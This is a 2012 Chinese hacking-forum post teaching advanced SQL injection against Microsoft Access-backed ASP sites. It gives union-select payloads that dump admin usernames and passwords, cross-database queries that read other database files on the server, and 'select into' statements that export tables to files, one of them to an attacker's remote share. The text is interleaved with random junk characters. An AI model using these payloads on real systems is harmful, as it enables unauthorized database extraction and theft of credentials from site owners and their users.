找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2179|回复: 0
打印 上一主题 下一主题

Access高级注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:20:57 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
--------------------------------------------------------------
# ^) a0 @4 f6 N/ X" Junion查询法
6 F4 C  A* _' ]( ?首先要说的就是查询办法,一般的查询办法就是
: e" y0 a0 c* N& Y  n: i5 o3 P
7 b: C8 D7 L7 `9 L* d3 X: B6 N程序代码
; R1 z* i. K: N; Oand 1=(select count(*) from admin where left(id,1)='1')& I8 ^/ r4 W( A6 G( [

6 g3 p! b8 O' p' y" z4 d+ I2 Y这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.3 L) _! @1 \0 b4 ?3 ~
所以这个时候,union select横空出现.别以为只能在PHP里用哦...
- k0 {7 D8 ?; p3 I( ?' O4 y譬如你有一个ACCESS点:
' U* s( W4 Y: z5 C0 ?程序代码
! `' n! Y" q# i3 }1 T* |http://bbs.tian6.com/xiaoyang.asp?coder=1; u1 U' Y8 Y) U) @  b; O, \8 x, C$ k
- Y/ @% b% V6 j3 L5 G* N
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),3 h# u6 o+ K6 q9 _3 T& o
然后我们直接来:
6 g- H4 r) O8 o, y6 s$ B程序代码
, w7 s4 g6 c/ P5 b" g: y* Mhttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]% F# u7 c- F8 P: r" B. u
4 r8 u. f; m( M% k! @0 L4 T
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.$ I; W/ E: [9 H# \6 p3 S, o. ~9 H
4 A5 K; [# }! X& f$ a7 X
$ \& F& R) ?: k+ f/ s8 X8 |7 f, P

6 t( ^! w: X" a8 e& e- U---------------------------------------------------------------# L3 P" D) e& G0 b) z
Access跨库查询5 G2 g- B& L- A$ B4 N. l0 Z
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.+ P' X1 s" r- P% |
跨库的查询语句:7 S* R2 h5 K2 d- M
子查询:
/ I- d, S; G. t. {" u  i; ~程序代码; L9 t& [! f& T/ @
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
; a6 f; ?1 a/ |5 }0 w# j! Y' [6 P3 X2 t9 f5 S$ _; n0 ~
union查询:
8 d( q! u* Z) {2 L程序代码
8 `/ l- D- W: r% i! R: Nunion select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=15 K, i0 N# o$ |+ K/ d
$ u% q6 H& \' F9 y! K
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:3 E; k  ]9 Q. x
程序代码9 f# w. h4 A/ F; y0 Q8 U' M( G
http://www.4ngel.net/article/46.htm ( {. d- k$ q2 b. ]$ O
http://hf110.com/Article/hack/rqsl/200502/66.html
: m' d( E  E: e+ b5 T7 n" m, J0 H3 e7 y# }+ D- }* R
---------------------------------------------------------------
/ [& Q- W, S( u6 P/ \& tAccess注入,导出txt,htm,html
' b# ]- D7 t0 `, l# [6 n2 F1 _) W- L子查询语句:
6 n7 L3 U* H, O, O# \8 H程序代码
$ b/ X% U$ v* s  A7 d7 `Select * into [test.txt] in 'd:\web\' 'text;' from admin  n3 f' d/ |; d/ k! x

9 l2 S8 a0 D: p5 ~- `, L, y9 x5 \$ v- A这样就把admin表的内容以test类型存进了d:\web里面.
3 ^( f7 E2 M: G; \/ r% L& hUNION查询:
- l1 F5 i0 Q/ x7 B程序代码
& }% b! J* s2 f% Y' ]  v  tunion select * into [admin.txt] in 'c:\' 'test;' from admin
7 _* [% Y. y6 m9 q1 k7 }# C9 T6 P+ _
而且这里也可以保存到本地来:
7 w' P  B+ x/ s, b/ a! s# q程序代码
1 [6 s8 z8 o: U; jSelect * into [test.txt] in '\\yourip\share' 'text;' from admin% m, [. Z" ^" o1 V8 W

' c( F2 B# {4 E! b- m不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
$ u2 G- E0 y( E$ D( S. u) Y+ {. D- c, x5 b/ Q' u
程序代码. V9 R/ @6 \7 _8 r3 k# A
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D73 C8 F: O3 z) g: F7 C  i3 N
* i9 y2 l! s: p
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.* t8 P/ Z8 W. e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表